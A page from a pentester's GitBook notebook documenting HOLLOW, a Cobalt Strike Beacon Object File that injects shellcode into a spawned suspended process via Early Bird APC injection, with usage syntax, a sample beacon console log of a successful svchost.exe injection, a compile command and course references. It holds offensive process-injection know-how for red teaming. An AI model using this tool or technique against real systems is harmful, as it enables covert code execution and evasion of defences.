☕
Brinkles Pentesting Notebook
  • Introduction
    • My Journey to Pentesting
    • Twitter
    • Github
  • Certification Reviews
    • OSEP Review
    • CISSP Review
    • OSCP Review
    • RTJC Review
    • RTAC Review
    • CEH Review
    • CRTO Review
    • PNPT Review
    • eWPT Review
    • eJPTv1 Review
    • CCNP Security Review
    • CCNA Review
    • CompTIA Net +, A+ Review
  • C2 and Payloads
    • Sliver C2
    • Cobalt Strike
      • BOFs and Aggressor Scripts
        • Situational Awareness BOF
        • HOLLOW BOF
        • DLL_Version_Enumeration_BOF
        • InlineExecute-Assembly BOF
        • BOF.NET
        • C2-Tool-Collection BOFs
        • Inline-Execute-PE
      • Payloads
  • Tools
    • Internal Tools
      • BloodHound
      • Certi
      • Coercer
      • CrackMapExec
      • DCSync
      • DFSCoerce
      • DonPAPI
      • WMIEXEC
      • Kerberoasting
      • Lsassy
      • mitm6
      • Pcredz
      • PowerSploit
      • PrivExchange
      • Responder / RunFinger
      • Rubeus
      • Seatbelt
      • Seth
    • Web App Pentesting
      • Payload All The Things
        • Directory traversal
          • Deep Traversal
          • More Directory Traversal Payloads
        • SAML Injection
        • XXE - XML External Entity
        • XSS - Cross Site Scripting
        • XSLT Injection
        • XPATH injection
        • Upload Insecure Files
        • SQL injection
          • MSSQL Injection
          • MYSQL Injection
          • Oracle SQL Injection
          • PostgreSQL injection
          • SQLite Injection
        • Server Side Templates Injections
        • Server-Side Request Forgery
          • Payloads Included in Server-Side Request Forgery
        • Request Smuggling
        • OAuth
        • NoSQL injection
        • LDAP injection
        • Kubernetes
        • JSON Web Token
        • HTTP Parameter Pollution
        • GraphQL injection
        • CORS Misconfiguration
        • CRLF
        • Cross-Site Request Forgery
        • CSV Injection (Formula Injection)
        • File Inclusion
          • PHPINFOlfi.py
          • uploadlfi.py
  • Network Security
    • DMVPN GRE NHRP IPsec Profiles
    • Flex VPNs
    • GET VPN with Key Server
    • IKE Site to Site w/ IPSec
    • Point to Point GRE over IPSec
    • Remote Access VPN
    • Helpful Cisco Firewall CLI Commands
Powered by GitBook
On this page
  • Run from Cobalt Strike Beacon Console
  • Compile with x64 MinGW (only tested from macOS):
  • To Do List
  • Credits / References
  1. C2 and Payloads
  2. Cobalt Strike
  3. BOFs and Aggressor Scripts

HOLLOW BOF

Authors:

  • Bobby Cooke (@0xBoku)

  • Justin Hamilton (@JTHam0)

  • Octavio Paguaga (@OakTree__)

  • Matt Kingstone (@n00bRage)

Beacon Object File (BOF) that spawns an arbitrary process from beacons memory in a suspended state, inject shellcode, hijack main thread with APC, and execute shellcode; using the Early Bird injection method taught by @SEKTOR7net in RED TEAM Operator: Malware Development Intermediate.

  • Sektor7 RED TEAM Operator: Malware Development Intermediate Course

Run from Cobalt Strike Beacon Console

  • After compile import the hollow.cna script into Cobalt Strikes Script Manager

beacon> help hollow
Synopsis: hollow /path/to/hollow/pe /local/path/to/shellcode.bin
beacon> hollow svchost.exe /Users/bobby.cooke/popCalc.bin
[*] HOLLOW - EarlyBird Remote Process Shellcode Injector (@0xBoku|github.com/boku7) | (@JTHam0|github.com/Rodion0)
[*]             (@n00bRage|github.com/josephkingstone) | (@OakTree__|github.com/git-oaktree)
[*] Reading shellcode from: /Users/bobby.cooke/popCalc.bin
[+] Success - Spawned process for svchost.exe at 5464 (PID)
[+] Success - Allocated RE memory in remote process 5464 (PID) at: 0x000001A83BEC0000
[+] Success - Wrote 280 bytes to memory in remote process 5464 (PID) at 0x000001A83BEC0000
[+] Success - APC queued for main thread of 5464 (PID) to shellcode address 0x000001A83BEC0000
[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!

Compile with x64 MinGW (only tested from macOS):

x86_64-w64-mingw32-gcc -c hollow.x64.c -o hollow.x64.o

To Do List

  • Refactor code to make it more modular/clean

  • Implement this into github.com/boku7/SPAWN

    • Combine this with the PPID spoofing and blockdll features of SPAWN

Credits / References

  • Credit/shoutout to: @SEKTOR7net + Raphael Mudge

Sektor7 Malware Dev Essentials course - learned how to do the early bird injection technique

  • https://institute.sektor7.net/red-team-operator-malware-development-essentials

Raphael Mudge - Beacon Object Files - Luser Demo

  • https://www.youtube.com/watch?v=gfYswA_Ronw

Cobalt Strike - Beacon Object Files

  • https://www.cobaltstrike.com/help-beacon-object-files

BOF Code References

  • https://github.com/odzhan/injection/blob/master/syscalls/inject_dll.c

  • https://github.com/ajpc500/BOFs/blob/main/SyscallsInject/entry.c

  • https://github.com/ajpc500/BOFs/blob/main/SyscallsInject/syscalls_inject.cna

PreviousSituational Awareness BOFNextDLL_Version_Enumeration_BOF

Last updated 2 years ago

Page cover image